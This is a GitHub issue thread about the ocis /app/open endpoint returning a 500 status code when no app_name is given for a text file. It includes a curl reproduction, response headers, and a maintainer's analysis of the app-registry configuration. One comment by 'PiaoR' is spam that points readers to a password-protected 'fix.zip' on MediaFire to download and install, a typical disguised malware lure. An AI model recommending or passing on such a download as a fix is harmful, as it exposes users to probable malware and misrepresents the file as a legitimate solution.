### ISSUE TITLE
Request with text file on `/apps/open` endpoint without `app_name` query parameter returns `500` status code

### ISSUE THREAD

**Issue by PrajwolAmatya** [owncloud/ocis#9928]
## Describe the bug
Sending `POST` request on the `/apps/` endpoint for text file without `app_name` query parameter, returns `500` status code.

## Steps to reproduce
1. Create a text file `textfile.txt`
2. Send `POST` request
```
curl -kv -XPOST -ueinstein:relativity "https://host.docker.internal:9200/app/open?file_id={file_id}" | jq

```
We get the following response:
```
< HTTP/1.1 500 Internal Server Error
< Content-Length: 134
< Content-Security-Policy: child-src 'self'; connect-src 'self' https://raw.githubusercontent.com/owncloud/awesome-ocis/; default-src 'none'; font-src 'self'; frame-ancestors 'self'; frame-src 'self' blob: https://embed.diagrams.net/ http://host.docker.internal:8080/; img-src 'self' data: blob: https://raw.githubusercontent.com/owncloud/awesome-ocis/ http://host.docker.internal:8080/; manifest-src 'self'; media-src 'self'; object-src 'self' blob:; script-src 'self' 'unsafe-inline'; style-src 'self' 'unsafe-inline'
< Content-Type: application/json
< Date: Wed, 28 Aug 2024 04:52:49 GMT
< Referrer-Policy: strict-origin-when-cross-origin
< Strict-Transport-Security: max-age=315360000; preload
< Vary: Origin
< X-Content-Type-Options: nosniff
< X-Frame-Options: SAMEORIGIN
< X-Permitted-Cross-Domain-Policies: none
< X-Request-Id: 1e726966028a/3wKHavZGzb-000286
< X-Robots-Tag: none
< X-Xss-Protection: 1; mode=block
< 
{ [134 bytes data]
100   134  100   134    0     0   4262      0 --:--:-- --:--:-- --:--:--  4322
* Connection #0 to host host.docker.internal left intact
{
  "code": "SERVER_ERROR",
  "message": "Error contacting the requested application, please use a different one or try again later"
}

```
We get the same response when requesting with unsupported file formats and for the endpoints:
- `/apps/open?file_id={file_id}`
- `/apps/open-with-web?file_id={file_id}`

## Expected behavior
The error message seems fine, but the status code can be `503` indicating `Service is unavailable`.

## Actual behavior
The response returns `500` status code which indicates `internal Server Error`.

cc @jvillafanez

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jvillafanez** [comment]
The error seems to be caused around https://github.com/cs3org/reva/blob/edge/internal/grpc/services/gateway/appprovider.go#L161-L169 . I think the request fails before reaching the collaboration service.

Assuming the above is true, there should be a default app that should be used for that extension in case no app is requested. Maybe there is no default app configured for plain text files.

I think the configuration file used to set up the default apps is the "app-registry.yaml" file. This is a piece of content I have for that file:
```
app_registry:
  mimetypes:
    - mime_type: application/pdf
      extension: pdf
      name: PDF
      description: PDF document
      icon: ''
      default_app: ''
      allow_creation: false
    - mime_type: application/vnd.oasis.opendocument.text
      extension: odt
      name: OpenDocument
      description: OpenDocument text document
      icon: ''
      default_app: Collabora
      allow_creation: true
```
If I remember correctly, the file was copied from the example deployment, and it doesn't have an entry for text files. That could explain why the request fails also trying to find the default app for the extension.

----

> The error message seems fine, but the status code can be 503 indicating Service is unavailable.

I'm not sure about that one. Since the request is done against ocis, a 503 might imply that ocis is down, which isn't the case. Even if we consider the 503 to be for the external service, it's weird that the same service is available and can respond properly for other file types.
